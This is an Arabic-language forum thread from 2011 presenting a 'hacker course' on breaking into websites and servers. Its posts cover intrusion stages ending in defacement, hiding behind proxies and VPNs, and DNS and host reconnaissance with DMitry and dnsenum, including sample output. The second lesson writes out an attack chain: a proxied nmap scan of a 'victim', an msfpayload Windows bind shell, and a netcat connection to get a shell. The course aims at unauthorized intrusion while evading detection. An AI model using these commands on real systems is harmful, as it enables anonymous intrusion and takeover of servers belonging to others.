حياة الفتح
’,، أهلاً .. وسهلاً .. ,’،

,’، (( اسم العضو )) ,’،

,’، نحن سعداء بتشريفك لمنتدانا
’,، فأهلاً بك عطْراً فوَّاحاً ينثرُ شذاه في كلِّ الأَرجاء ,’،
,’، وأهلاً بك قلماً راقياً وفكراً واعياً نشتاقُ لنزفه ’,،
’,، وكلنا أملٌ بأن تجد هنا ,’،
,’، مايسعدك ويطَيِّب خاطرك ’,،
’,، فِي إنْتظَارِ هطولِ سحابة إبداعك ,’،
,’، نتمنى لَك التوفيق ومزيداً من التوهج ’,،
’,، تَحيّاتِي وَتَقْديرِي ,’،

حياة الفتح

حياة الفتح في فلسطين والظل العربية
 
الرئيسيةاليوميةمكتبة الصورس .و .جبحـثالأعضاءالمجموعاتالتسجيلدخولمرحبا بك  من جديد في منتدى الفتحتسجيل دخول

شاطر | 
 

 دورة الهكـــــــــــــــــــــــــــــــــــر

اذهب الى الأسفل 
كاتب الموضوعرسالة
ابو عمار
المراقب العام
المراقب العام
avatar

عدد الرسائل : 1406
العمر : 34
سمعاتك وشهرتك : 2
تاريخ التسجيل : 04/10/2008

تسميتك
مجموعة كل فلسطيني : المنتدى جميل

مُساهمةموضوع: دورة الهكـــــــــــــــــــــــــــــــــــر   الجمعة يوليو 22, 2011 7:24 am

السلام عليكم ورحمة الله وبركاته


باذن الله الدورة هبتدى فيها من الصفر لحد مستويات متقدمة !

---------------------------

ندخل على طريقة الدراسة :-

كما وعدناكم بان الدورة هتكون مختلفة كليا عن كل الدورات الموجودة فى باقى الامكان بقدر الامكان علشان كدة انا هعملها كـ security training مش دورة عادية !!!

وعلشان نعمل security training ناجح ده بيتطلب عدة طرق واساليب فى التدريس باذن الله انا هتكفل بيهم !!

انا عارف ان الدرس دة المفروض موجود من يوم الاثنين بس للاسف الظروف منعت وادى الدرس ما بين ايديكم دلوقت وباذن الله بكرة هنزل تانى درس وهفتح موضوع استفسارات للاثنين مع بعض

درسنا اليوم عبارة عن بداية بسيطة وتعريف بالمجال الى هناخد فيه الدورة دى الى هو باذن الله مجال اختراق المواقع والسرفرات وعالمها الغريب ده !!

فى البداية لازم اضع نفسى مكان واحد صاحب موقع او اى زائر بمجرد ما بيدخل على موقع هو بيحبة ويلاقى فجاءة صفحة سوداء تقولك " تم الاختراق !"

الى هنحاول نوصل له فى دورتنا دى هو ايه العملية الى تمت من اول ما المخترق شاف الموقع لحد ما قدر انو يسيطر على الموقع وعلق الصفحة دى !

*******************************

طيب نيجى دلوقت لتعريف بسيط بمجال اختراق المواقع والسرفرات :- المجال الخاص باختراق المواقع والسرفرات عموما مجال كبيير وملهوش تعريف محدد انما نقدر نقول انو العلم اوالفن الى بيملكه بعض الناس من ذوى الخبرة العالية وبيمكنهم من الحصول على معلومات مخزنة فى سرفر او موقع بعيد على الشبكة .

بالتاكيد ان التعريف ده مش كامل او ناقص

لاننا عارفين ان الشبكة بحر كبيير مفيش اى شخص بعينة بيملكة لاكن ده التعريف الاصح لحد الان

طيب لو انت دلوقت شايف موقع مخالف وعاوز تخترقة هتعمل ايه ؟

اكيد فى مجموعة من الخطوات الاساسية الى لازم نعملها :-


اولها جمع المعلومات

ثانيا انك تستفيد من المعلومات المتجمعة فى الدخول على السرفر

ثالثا تقدر تعدى كل الحمايات الموجودة قدامك بطرق ديناميكية قابله للتجديد (وهنا العب كله !)

ثالثا تسيطر على السرفر

رابعا ترجع لهدفك الاصلى وهو اختراق الموقع الى شفتة اول مرة وتسطير عليه !

طيب دلوقت وضحنا الخطوات الى المفروض نمشى عليها لما نخترق موقع او سرفر طيب ايه المسار الى هنتخذة داخل السرفر يعنى هندخل ازاى على السرفر الى قدامنا ؟

فى الغالب لو ثغرة فى سكربت واحد على موقع واحد من 1000 موقع على سرفر كبيير بتعرض باقى المواقع كلهم للخطر وقابلية الاختراق بسبب ممكن دالة واحدة خاطئة !

بمعنى اصح ان المخترق بيرتب لنفسة بحيث انو فى الاول بيقوم بالبحث عن خطاء او نقطة ضعف ثم يستغلها للدخول على السرفر او الحصول على " اكسس " على السرفر


vlun --> Access --> ByPassing sec --> Rooting --> fucking the admin mind

دة المسار الى بيمشى عليه المخترق فى عملية الاختراق من بعد جمع المعلومات


---------------------------------------------------------------------------------------------------

لحد هنا عرفنا الخطوات الى بيمشى عليها المخترق + ايه المسار السليم الخاص بعمليه الاختراق !

طيب فاضل حاجة واحدة الى هيا اليه الاختراق !!!

فى الاول لازم نفهم كويس ان اى نظام موجود خليط من عنصرين هم العنصر المادى والعنصر البشرى وكل عنصر فيهم له دور مختلف عن الاخر

فى الاول العنصر البشرى هو العنصر الاضعف فى اى نظام + هو العنصر الرئيسى فى نفس الوقت !

بمعنى ان مدير النظام ويمثل العنصر البشرى بيركب سكربت او برنامج على السرفر الخاص بيه البرنامج الى هو مركبة بيكون مصممة مبرمج وبيمثل العنصر البشرى وكل دة علشان يعرض الموقع ومحتواه للزوار بشكل سليم وبيمثلوا العنصر البشرى ايضا !

ولما اى مخترق يخترق النظام بيكون فيه ثغرات اما من خطاء من المبرمج فى كتابة البرنامج او خطاء من مدير النظام او فرد من الشركة المستضيف ....الخ

بمعنى ان كل الاخطاء الى بتحصل هى اخطاء بيتحملها العنصر البشرى اما العنصر المادى كل ما عليه هو التنفيذ للاوامر الصادرة عن العنصر البشرى فقط لا غير !!

طبعا النظام الى العنصر البشرى فيه كامل غير موجود نهائيا > لان الكمال لله تعالى <

للسبب ده مفيش حماية كاملة ولنفس السبب ظهر مصطلح أليه الاختراق ليعبر عن اللاخطاء الموجودة فى العنصريين المادى والبشرى وطرق استغلالهم للوصول الى الاختراق السليم للهدف !!!

طبعا الاختراق مش مجرد ثغرة وشل ولوكال وسركبت تدفيس وخلاص

انما عملية الاختراق فن وكل فنان ممكن نسمية مخترق فعلى هو الى يقدر يعمل كل حاجة من غير ما حدا يعرف وده الى نسمية مخترق جيد :P

لحد هنا باذن الله نكون خلصنا مقدمتنا المتواضعة !

#################################

بعض التنبيهات الهامة :-

1- عدم تمرير روابط الدورة او اعارة العضوية الخاصة بيك لاى حد من خارج المشتركين فى الدورة حتى لو انا

2- عدم تسريب اى من الدروس الموجودة فى الدورة الا بعد انتهاء الدورة بشكل كامل (والكمال لله وحدة).

3-لا يجوز باى حال من الاحوال ان يتم الاشارة "بدون تسريب لاى محتوى " لاى درس من دروس الدورة .

4- لا يمكن لاى عضو طلب اختراق موقع معين او فحص شل معين .

5- فى حالة مخالفة اى من الشروط الموجوده اعلاه يتعرض العضو لايقاف كامل لعضويتة من المنتدى بشكل نهائى وليس فقط طردة من الدورة .

6- يمكن لاى عضو عمل اى اقتراح على الدورة او طرق الشرح او طلب لاى درس او اى مشكلة يواجها فى موضوع الاقتراحات !

**********************************

<FONT FACE="Arial" SIZE="5" COLOR="#00FF00"> This <‎/FONT>






الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://alfateh.yoo7.com
ابو عمار
المراقب العام
المراقب العام
avatar

عدد الرسائل : 1406
العمر : 34
سمعاتك وشهرتك : 2
تاريخ التسجيل : 04/10/2008

تسميتك
مجموعة كل فلسطيني : المنتدى جميل

مُساهمةموضوع: رد: دورة الهكـــــــــــــــــــــــــــــــــــر   الجمعة يوليو 22, 2011 7:26 am

بسم الله الرحمن الرحيم

اهلا بيكم فى ثانى درس من دروس دورة اختراق المواقع والسرفرات


فى الدرس السابق وضحنا ان من اهم الخطوات الواجب القيام بها عند الاختراق هيا جمع المعلومات لاكن فى الاول لازم نركز على قضيه مهمة وهى التخفى على الشبكة !

قبل القيام باى عملية لازم نكون متامنين على النت كويس او باعلى قدر من الامان وعلشان كدة ظهر ما يعرف باسم البروكسى "Proxy"

فى عميلة التخفى يتم استعمال ادوات وبرامج خاصة زى البروكسى مثلا للتخفى او الدخول باستخدام عنوان اخر .

درسنا النهاردة باذن الله هيكون درس خفيف جدا جدا > اوعى حد يتعود على كدة < عن التخفى وشرح لبعض ادوات البروكسى .

0-------------------0

بسم الله نبداء

فى الاول هتكلم عن اداة قوية فى عمليات التخفى وهيا اداة charlesproxy وان كان بعض الناس ممكن تختلف معى الا ان الاداة دى اثبتت فعلا قوتها وجدارتها بانها تصنف ضمن الادوات العليا فى التخفى

الاول موقع الاداة من هنا

الاداة قوية جدا وبتدعم خصائص كتيير جدا من النادر انك تلاقيهم فى اداة واحدة فهى بتدعم التخفى بالطرق الاتية

* Throttling
* Breakpoints
* SSL Proxying
* Reverse Proxy
* Port Forwarding

وكمان تحتوى على اداوت كتيير جدا مفيدة ممكن تستعملها اثناء عمليات الاختراق منها

* No Caching
* BlockC0okies
* Map Remote
* Map Local
* Rewrite
* Black List
* DNS Spoofing
* Mirror
* Auto Save
* Client Process
* Repeat
* Repeat Advanced
* Edit
* Validate

وممكن تحمل نسخة مجانية من الاداة من هنا


بعد التحميل فقط فك الضغط عن الاداة وشغلها وللعلم الاداة بتشتغل على واجهة ال GNU

عيب الاداة الوحيد انها اداة مدفوعة الثمن انما لها خواص كتيييرة

ندخل دلوقت على ثانى اداة عندنا النهاردة الى هيا اداة ال proxyknife او المعروفة باسم phc or proxy hunter customed

اداة قوية جدا من الاداوات الى بتنزل على اللينكس احيانا بيتيجى جاهزة مع بعض الصدارات وهيا من تقديم ال GNU PROJ عموما تقدروا تحملوا الاداة من هنا

عموما الاداة فعلا قديمة جدا لاكنها قوية جدا فى نفس الوقت عموما الاداة سهلة جدا جدا فى الاستخدام حملها بس انت وفك الضغط عنها وشغلها وانت تلاقى كل حاجة تمام معاك !

فاضل عندنا اخر حاجة الى هيا اداة ال

ProxyChains

سنتوقف قليلا ونشرح هذه الاداة

الكثير منا حاول يخترق مواقع لكن المشكله في IP المهاجم ,, ممكن ينصاد عن طريقه

على العموم اليوم راح نفحص بـ nmap ونستخدم ثغره عن طريق البروكسي

انتبه انتبه انتبه , عند اختيار البوركسي ,

لان ممكن يضيع عليك الثغرات, والثغرات اللي ممكن تشتغل مش مشتغله وكله بسبب البروكسي :-)

البروكسي المستخدم :
212.116.220.149:443

الاداه اللي راح نستخدمها هي proxychains

الاداه قويه واستخداماتها متنوعه ,, ببساطه هي عمل TCP tunneling عن طريق socks4/5 & http/s
فائدة الـ proxychains يجبر اي برنامج بأن يشتغل خلف بروكسي


لذلك انا راح استخدمها للاختراق والفحص :-)

الشرح فديو لكن بوضح بعض الاشياء ,



كود PHP:
nano /etc/proxychains.conf

انا وضعت البروكسي داخل الاعدادات




كود PHP:
proxychains nmap -PN -sT -sV -p 21,22,23,25,80 my-victim

انا اجبرت الـ nmap بأن يشتغل ورا بروكسي ويقوم فحص IP ضحيتي


ممكن تستخدم ادوات اخرى مثل nikto لكن ما يحتاج انك تستخدم proxychains لان

nikto له خاصيه العمل خلف بروكسي

بعد الفحص وجدنا ان بورت 21,80 مفتوحه , وراح نلاحظ ان الـ nmap اعطاني الـ بنر للبورت 21

وقدرت اطلع ثغره موجوده ,,


كود PHP:
msfpayload windows/shell_bind_tcp lport=585 C

علمت شل كود , وراح يعطيني شل على البورت 585



كود PHP:
proxychains nc -vn my-victim 585

الان حصلت شل عن طريق البروكسي

للتحميل

http://proxychains.sourceforge.net/

شرح الاداة لاخونا اخونا SiLv3r00t

والان نكمل الموضوع


لحد هنا نكون انجزنا فى موضوع البروكسى يعنى 3 اداوت لو تستعمل اداة منهم بغرض التخفى وانا شخصيا بفضل ال ProxyChains

0-------------------------0

زى ما قلنا التخفى طرقة كتيير دلوقت ندخل على طريقة تانى الى هيا ال VPN او ال Virtual Private Network

وهى طريقة جميلة جدا وفعالة للتخفى داخل شبكة وهمية والخدمة دى فى واقع كتيير جدا جدا بتقدمها اشهرها موقع http://openvpn.net

وممكن انت بنفسك تعمل VPN خاصة بيك لاكن دى بتحتاج شغل شوية

عموما احنا كل الى عاوزينة اننا نتخفى مش اكتر يبقى هنستعمل ارقام VPN خاصة ممكن نجمعها من على النت
طيب ازاى ممكن انك تستعمل رقم ال VPN ده عندك ؟
فيه طرق كتيير لاكن انا بفضل الطريقة الموجودة فى الموقع الرسمى

عموما دة الرابط الى علية الشرح من هنا
https://pr.ivacy.com/en/doc/user/setup/linux

<FONT FACE="Arial" SIZE="5" COLOR="#00FF00"> This <‎/FONT>






الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://alfateh.yoo7.com
ابو عمار
المراقب العام
المراقب العام
avatar

عدد الرسائل : 1406
العمر : 34
سمعاتك وشهرتك : 2
تاريخ التسجيل : 04/10/2008

تسميتك
مجموعة كل فلسطيني : المنتدى جميل

مُساهمةموضوع: رد: دورة الهكـــــــــــــــــــــــــــــــــــر   الجمعة يوليو 22, 2011 7:32 am

فى الدرس الى فات اتكلمنا عن التخفى وقلتلكم انى هشرح اغلب الدروس على ال B|T الى هيا ال back|track عموما انتو ممكن تستخدموا اى توزيعة لينكس تانى تريحكم لاكن الشرح باذن الله هيكون على ال B|T !

درسنا النهاردة هو اهم درس فى الدورة كلها او اهم درس على الاطلاق لاننا هنتناول فيه طرق جمع المعلومات والفحص

النهادرة باذن الله هنتناول الجزء الاول من طرق جمع المعلومات وهنتكلم فيه عن بعض ادوات جمع المعلومات !

جمع المعلومات بيتم على اساس طريقة الاختراق الى هتستخدمها يعنى لو هتسحب الدومين يبقى لازم نعرف بيانات ال Host وصاحب الموقع وكمان بيانات ال dns وهكذا ولو قررت انك تخترق بثغرات يبقى لازم تكون عارف السوفت وير على السرفر والسكربتات الموجودة

طيب على اساس كدة انا قسمت جمع المعلومات لعدة موديلات

الاول:- جمع المعومات عن ال DNS وال HOST

الثانى :- جمع المعلومات عن ال Protocols

الثالث:- جمع المعلومات عن الW3b App وفحص ثغراتها


----------------
نبداء على بركة الله

فى الاول انت طبعا بتختار هدف معين سرفر او موقع لاى سبب عندك > اتمنى عدم استهادف المواقع العربية <

اول حاجة هنحتاج اننا نعملها اننا نجمع معلومات عن ال HOST&DNS الخاص بالهدف
ولعمليه جمع المعلومات عن ال HOST&DNS هنستخدم مجموعة اداوات هي:-


DMitry
dnsenum
FindDomains ( 4 windows)

وكل الادوات دى موجودة فى نسخة ال BT4 جاهزة وتقريبا

طيب نبتدى باول اداة وهي اداه DMitry ودى اداة مصممة خصيصا لجمع ملعومات الدومينات ووبكل سهولة ممكن انكم تجمعوا اكبر قدر من المعلومات باقل مجهود !

الاول نشوف وظايف الاداة او الخدمات الى ممكن تفيدنا بيها

كود PHP:

get_host()
get_netcraft()
get_nwhois()
get_iwhois()
get_subdomains()
get_emails()
subdomains()
portscan()
يعنى ممكن بيها نشوف host الهدف بتاعنا
وممكن نشوف بيانات الهدف من موقع ال netcraft
وكمان نتعرف على ال nwhois وال iwhois وكمان ال subdomains وممكن نشوف الايميلات المتخدة مسار الموقع او الايميلات المعموله على السرفر وممكن نعمل فحص للبورتات او المنافذ المفتوحة فى بروتوكول ال Tcp !
طيب نشوف دلوقت اوامر التشغيل
اول امر -o ودة بيدى امر للاداة انها تحفظ النتايج فى ملف نصى اسمة host.txt
ثانى امر -i ودة لعمل whois lookup لل Ip الى انت اديته للاداة
ثالث امر -w ودة لعمل whois lookup برضو لاكن للدومين نفسة !

واعتقد دوول اهم الاوامر علشان كدة شرحتهم بالعربى لاكن دى باقى الاوامر بتاعت التشغيل


كود PHP:

-n Retrieve Netcraft.com information on a host
-s Perform a search for possible subdomains
-e Perform a search for possible email addresses
-p Perform a TCP port scan on a host
* -f Perform a TCP port scan on a host showing output reporting filtered ports
* -b Read in the banner received from the scanned port
* -t 0-9 Set the TTL in seconds when scanning a TCP port ( Default 2 )

طيب لو انا عاوز انى استخدم كل الخصائص بتاعت الاداة اعمل ايه ؟

يبقى ساعتها استخدم الامر دة

كود PHP:

dmitry -winsepffb -o host.txt google.com

وبكدة الاداة هتبداء فى تجميع المعلومات عن الموقع وبعدها هتحفظ كل حاجة فى ملف اسمة host.txt نفتح الملف ونلاقي المعلومات زى كدة

كود PHP:


HostIP:64.233.187.99
Host****:google.com

Gathered Inet-whois information for 64.233.187.99
---------------------------------

Org****: Google Inc.
OrgID: GOGL
Address: 1600 Amphitheatre Parkway
City: Mountain View
StateProv: CA
PostalCode: 94043
Country: US

NetRange: 64.233.160.0 - 64.233.191.255
CIDR: 64.233.160.0/19
Net****: GOOGLE
NetHandle: NET-64-233-160-0-1
Parent: NET-64-0-0-0-0
NetType: Direct Al********
****Server: NS1.GOOGLE.COM
****Server: NS2.GOOGLE.COM
****Server: NS3.GOOGLE.COM
****Server: NS4.GOOGLE.COM
Comment:
RegDate: 2003-08-18
Updated: 2007-04-10

RTechHandle: ZG39-ARIN
RTech****: Google Inc.
RTechPhone: +1-650-318-0200
RTechEmail: arin-contact@google.com

OrgTechHandle: ZG39-ARIN
OrgTech****: Google Inc.
OrgTechPhone: +1-650-318-0200
OrgTechEmail: arin-contact@google.com

# ARIN WHOIS database, last updated 2007-07-10 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

Gathered Inic-whois information for google.com
---------------------------------

Domain ****: GOOGLE.COM
Registrar: MARKMONITOR INC.
Whois Server: whois.markmonitor.com
Referral URL: http://www.markmonitor.com
**** Server: NS1.GOOGLE.COM
**** Server: NS2.GOOGLE.COM
**** Server: NS3.GOOGLE.COM
**** Server: NS4.GOOGLE.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 10-apr-2006
Creation Date: 15-sep-1997
Expiration Date: 14-sep-2011

>>> Last update of whois database: Wed, 11 Jul 2007 07:58:19 UTC <<<

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain **** registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain **** registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain ****s or
modify existing registrations; the Data in VeriSign Global Registry
Services ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain **** registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain ****s or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

Gathered Netcraft information for google.com
---------------------------------

Retrieving Netcraft.com information for google.com
Operating System: Linux
***Server: GWS/2.1
No uptime reports available for host: google.com
Netcraft.com Information gathered

Gathered Subdomain information for google.com
---------------------------------
Searching Google.com:80...
Host****:images.google.com
HostIP:64.233.169.99
Host****:video.google.com
HostIP:216.239.51.99
Host****:news.google.com
HostIP:72.14.219.99
Host****:maps.google.com
HostIP:66.102.1.103
Host****:mail.google.com
HostIP:66.249.83.19
Host****:www.google.com
HostIP:64.233.169.103
Host****:blogsearch.google.com
HostIP:66.102.1.104
Host****:books.google.com
HostIP:72.14.247.133
Host****:docs.google.com
HostIP:66.249.81.100
Host****:finance.google.com
HostIP:66.102.1.99
Host****:groups.google.com
HostIP:64.233.179.99
Host****:labs.google.com
HostIP:209.85.163.132
Host****:picasa***.google.com
HostIP:72.14.255.91
Host****:scholar.google.com
HostIP:66.102.1.103
Host****:earth.google.com
HostIP:64.233.169.104
Host****:toolbar.google.com
HostIP:66.102.1.102
Host****:sketchup.google.com
HostIP:72.14.207.99
Host****:code.google.com
HostIP:66.102.1.147
Host****:directory.google.com
HostIP:64.233.169.99
Host****:desktop.google.com
HostIP:64.233.161.104
Host****:pages.google.com
HostIP:72.14.207.118
Host****:picasa.google.com
HostIP:66.102.1.99
Host****:moon.google.com
HostIP:64.233.169.147
Host****:base.google.com
HostIP:216.239.51.99
Host****:checkout.google.com
HostIP:66.249.81.115
Host****:pack.google.com
HostIP:66.102.1.99
Host****:***accelerator.google.com
HostIP:66.102.1.103
Host****:catalogs.google.com
HostIP:72.14.247.133
Host****:adwords.google.com
HostIP:64.233.161.112
Host****:answers.google.com
HostIP:64.233.179.88
Host****:tools.google.com
HostIP:66.102.1.101
Host****:gears.google.com
HostIP:66.102.1.113
Host****:translate.google.com
HostIP:66.102.1.99
Host****:wap.google.com
HostIP:64.233.169.147
Host****:services.google.com
HostIP:64.233.179.110
Host****:investor.google.com
HostIP:66.102.1.104
Host****:upload.video.google.com
HostIP:64.233.161.116
Host****:local.google.com
HostIP:66.102.1.104
Host****:wifi.google.com
HostIP:64.233.179.123
Host****:w.google.com
HostIP:64.233.169.99
Host****:api.google.com
HostIP:64.233.179.104
Host****:eval.google.com
HostIP:216.239.51.84
Host****:mobile.google.com
HostIP:66.102.1.104
Host****:www.l.google.com
HostIP:64.233.169.103
Host****:print.google.com
HostIP:66.102.1.103
Host****:froogle.google.com
HostIP:216.239.51.104
Searching Altavista.com:80...
Found 46 possible subdomain(s) for host google.com, Searched 9 pages containing 900 results

Gathered E-Mail information for google.com
---------------------------------
Searching Google.com:80...
Searching Altavista.com:80...
Found 0 E-Mail(s) for host google.com, Searched 3 pages containing 300 results

وبكدة نكون خلصنا جمع المعلومات للاداة دى اما لو ملقيتاش على النسخة الى بتستخدمها ممكن تحملها من هنا


http://www.mor-pah.net/code/DMitry-1.3a.tar.gz



طيب دلوقت نخش على مجموعة اداوت ال DNS ونبداء باول اداة فيهم وهيا اداه ا dnsenumr

ودى اداة مخصصة لجمع معلومات ال DNS المتوفرة حول موقع معين او هدف معين ناخد مثال صغير

الموقع ده http://u413.com/ كتطبيق بسيط
الاول نعمل فحص بالامر دة

كود PHP:

./dnsenum.pl --enum -f dns.txt -u a -r u413.com

طيب نشوف النتيجة زى كدا


كود PHP:

#
dnsenum.pl VERSION:1.2
#

#
----- u413.com -----
#

#
-----------------
#
Host's addresses:
#
-----------------
#
u413.com. 3262 IN A 173.201.74.219
#

#
-------------
#
**** servers:
#
-------------
#
ns26.domaincontrol.com. 863 IN A 208.109.255.13
#
ns25.domaincontrol.com. 885 IN A 216.69.185.13
#

#
-----------
#
MX record:
#
-----------
#
ASPMX.L.GOOGLE.com. 293 IN A 209.85.223.91
#
ALT1.ASPMX.L.GOOGLE.com. 293 IN A 209.85.217.21
#
ALT2.ASPMX.L.GOOGLE.com. 293 IN A 74.125.93.27
#
ASPMX2.GOOGLEMAIL.com. 3600 IN A 209.85.135.27
#
ASPMX3.GOOGLEMAIL.com. 3600 IN A 72.14.213.27
#

#
---------------------
#
Trying Zonetransfers:
#
---------------------
#

#
trying zonetransfer for u413.com on ns26.domaincontrol.com ...
#

#
trying zonetransfer for u413.com on ns25.domaincontrol.com ...
#

#
--------------------------------------------
#
Scraping u413.com subdomains from google:
#
--------------------------------------------
#

#
---- Google search page: 1 ----
#

#
Google results: 0
#
perhaps google is blocking our queries.
#

#
------------------------------
#
Brute forcing with dns.txt:
#
------------------------------
#
email.u413.com. 3600 IN C**** mail.u413.com.
#
mail.u413.com. 3600 IN C**** ghs.google.com.
#
ghs.google.com. 51332 IN C**** ghs.l.google.com.
#
ghs.l.google.com. 300 IN A 74.125.77.121
#
ftp.u413.com. 3600 IN C**** u413.com.
#
u413.com. 3600 IN A 173.201.74.219
#
mail.u413.com. 3600 IN C**** ghs.google.com.
#
ghs.google.com. 57651 IN C**** ghs.l.google.com.
#
ghs.l.google.com. 300 IN A 74.125.77.121
#
pop.u413.com. 3600 IN C**** pop.gmail.com.
#
pop.gmail.com. 300 IN C**** gmail-pop.l.google.com.
#
gmail-pop.l.google.com. 300 IN A 74.125.95.109
#
smtp.u413.com. 3600 IN C**** smtp.gmail.com.
#
smtp.gmail.com. 300 IN C**** gmail-smtp-msa.l.google.com.
#
gmail-smtp-msa.l.google.com. 300 IN A 72.14.221.109
#
gmail-smtp-msa.l.google.com. 300 IN A 72.14.221.111
#
www.u413.com. 3600 IN C**** u413.com.
#
u413.com. 3600 IN A 173.201.74.219
#

#
---------------------
#
Performing recursion:
#
---------------------
#

#
---- checking subdomains NS records ----
#
u413.com. 3581 IN NS ns25.domaincontrol.com.
#
u413.com. 3581 IN NS ns26.domaincontrol.com.
#
u413.com. 3600 IN NS ns25.domaincontrol.com.
#
u413.com. 3600 IN NS ns26.domaincontrol.com.
#

#
Can't perform recursion no NS records.
#

#
-----------------------
#
Lunching whois queries:
#
-----------------------
#
whois ip result: 173.201.74.0 -> 173.201.0.0/16
#

#
----------------------------
#
u413.com whois netranges:
#
----------------------------
#
173.201.0.0/16
#

#
----------------------------------------------------
#
Performing reverse lookup on 65536 ip addresses:
#
----------------------------------------------------
#

#
0 results out of 65536 ip addresses.
#

#
---------------------
#
u413.com ip blocks:
#
---------------------
#

#
done.
طيب دلوقت ندخل على تانى اداة وهى مصممة مخصوص لحبايبنا مستخدمين الويندوز

هى اداة لجمع اسامى النطاقات عن سرفر معين

فى الاساس بتعتمد عى موقع Bing فى جمع المعلومات

الاستخدام بسيط جدا من نافذة اوامر الدوس

Example Usage :
FindDomains***** 1.2.3.4
FindDomains***** www.hotmail.com


لاكن لازم تكون مسجل على انك Developer فى موقع Bing للتسجيل من هنا
http://www.bing.com/developers/createapp.aspx

ولتحميل الاداة من هنا

http://finddomains.googlecode.com/files/FindDomainsv0.1.1.rar


*****************
لحد هنا انتهى الجزء الاول من جمع المعلومات
طبعا اكيد الناس هتتكلم ان الدرس بسيط وتافه وكدة لاكن لو فهمت الدرس صح هتقدر اهميتة

عموما انا شرحت اداتين فقط فى الجزء دة لكن فى ادوات كتيييييييييير جدا جدا جدا للقيام بالعمل المطلوب!

ودى قائمة بمجموعة من الاداوات

dig
DMitry
DNS-Ptr
dnstracer 1.5
dnswalk
dns-bruteforce
dnsenum
dnsmap

وطبعا كلها موجودة على الباك تراك وممكن انكم تستعملواها بكل سهولة واى استفسار انا حاضر معاكم باذن الله

وزى ما انتو شايفين انا اديتكم بداية استخدام الاداة وانتو عليكم التكميل لانى انا مش هكون موجود معاكم للابد ولازم تتعلموا طرق استخدام الادوات البسيطة الى زى دوول عمواما جربوا الاداوات
فى الدرس القادم بمشيئة الرحمن هنتكلم عن كيفية معرفة انواع البروتوكولات الموجودة فى السرفر بادوات بسيطة جدا +فحص تطبيقات الويب باكثر من اداة ومن ضمنها الميتا سبلويت

<FONT FACE="Arial" SIZE="5" COLOR="#00FF00"> This <‎/FONT>






الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://alfateh.yoo7.com
ابو عمار
المراقب العام
المراقب العام
avatar

عدد الرسائل : 1406
العمر : 34
سمعاتك وشهرتك : 2
تاريخ التسجيل : 04/10/2008

تسميتك
مجموعة كل فلسطيني : المنتدى جميل

مُساهمةموضوع: رد: دورة الهكـــــــــــــــــــــــــــــــــــر   الجمعة يوليو 22, 2011 7:34 am

النهاردة باذن الله عندنا رابع درس من دروس دورتنا لاختراق المواقع والسرفرات وزى ما وعدتكم انى هراعى التبسيط لابعد الحدود !

باذن الله درسنا النهاردة هو تكمله لمنظومة جمع المعلومات الى بدئناها الدرس الى فات بجمع المعلومات عن ال DNS ودلوقت هندخل فى عمليات جمع المعلومات عن ال w3b App. او تطبيقات الويب وهى السكربتات والبرامج الى بتشتغل على الويب زى ما انت بتشوفها قدامك كدة
عاوزكم تعرفوا ان فى طرق كتيير جدا جدا للفحص لاكن هنا انا هتكلم عن ابسط الطرق الى هتسهل عليكم عمليات الفحص !

بسم الله نبداء :-
درسنا النهارده بحبيب الشعب كله ال m3tasploit وهستخدمة فى عمليات الفحص
للعلم الميتا سبلويت مشروع قوى جدا وله استعمالات كتيير لاكن انا هنا هركز على فحص المواقع فقط لا غير واعداد قاعدة بيانات متكاملة للفحص بتاعك وازاى ممكن تطلع بياناتك بكل سهولة

فى الاول احنا هنشتغل على اضافتين للميتا سبلويت وهم

1- The Dradis Framework & Nmap

طبعا اداة ال nmap مشهورة فى مجال الفحص لاكن ادااة ال The Dradis Framework ممكن محدش سمع عنها قبل كدة وهى اداة لتنظيم نتائج الفحص + عمل مشاركة للمعلومات الموجودة فى الفحص ونتائجة ومفيدة جدا بين افراد الفرق

دلوقت نبداء فى عمليات التثبيت على الجهاز!

افتح تريمنال جديد واكتب الامر التالى

apt-get install dradis

دلوقت استنى شوية لحد ما يحمل الاداة بعدين لما يخلص اكتب الامر دة لللانتقال لمسار الاداة

cd /pentest/misc/dradis/server

بعدها على طوول الامر دة لتشغيل الواجهة الرسومية للاداة

ruby ./script/server
دلوقت ادخل المتصفح العادى يعنى الفايرفوكس او غيرة وحاول تتصفح العنوان ده

https://localhost:3004


دلوقت خلصنا اداة ال dradis وجهزناها هندخل على ال Nmap ونفحص بيها من خلال الميتا سبلويت
دلوقت افتح تريمنال جديد واكتب الاوامر دى بالترتيب علشان تشغل الميتا سبلويت

cd /pentest/exploits/framework3

بعدها

./msfconsole

دلوقت انت شغلت الميتا سبلويت عندك وكله تمام دلوقت هنعمل فحص مثلا على ال Localhost بتاعت الجهاز بتاعى انما انت ممكن تعمل سكان على اى موقع يعجبك

طيب دلوقت هنعمل قاعدة بيانات جديدة ونشتغل عليها

اكتب الاوامر التالية بالترتيب

load db_mysql

db_create root:mypassword@localhost/myscan

db_connect root:mypassword@localhost/myscan

